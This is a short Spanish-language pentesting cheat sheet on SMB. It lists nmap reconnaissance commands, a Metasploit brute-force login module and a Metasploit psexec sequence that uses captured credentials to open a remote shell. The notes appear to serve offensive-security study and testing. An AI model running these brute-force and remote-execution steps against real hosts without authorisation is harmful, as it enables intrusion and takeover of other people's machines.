search

SMB

hashtag
Reconocimiento con NMAP

nmap -sCV <ip>

Si pone el siguiente mensaje: Message signing enabled but not required podemos usar PsExec (Nos permite Ejecutar comandos)

El siguiente comando nos permitirá ver el tipo de samba/smb que esta corriendo y después buscamos exploit respecto a la versión

nmap -p 445 --script smb-os-discovery <IP>

hashtag
Fuerza bruta con metasploit

Módulo a utilizar: auxiliary/scanner/smb/smb_login

hashtag
PsExec con Metasploit (Recomendado)

Módulo a utilizar: exploit/windows/smb/psexec

use exploit/windows/smb/psexec
set RHOSTS <IP>
set SMBUser <User>
set SMBPass <Password>
exploit
shell

hashtag
PsExec

Si tenemos las credenciales y se cumple la condición mencionada arriba (Message signing enabled but not required) podemos usar la herramienta

Última actualización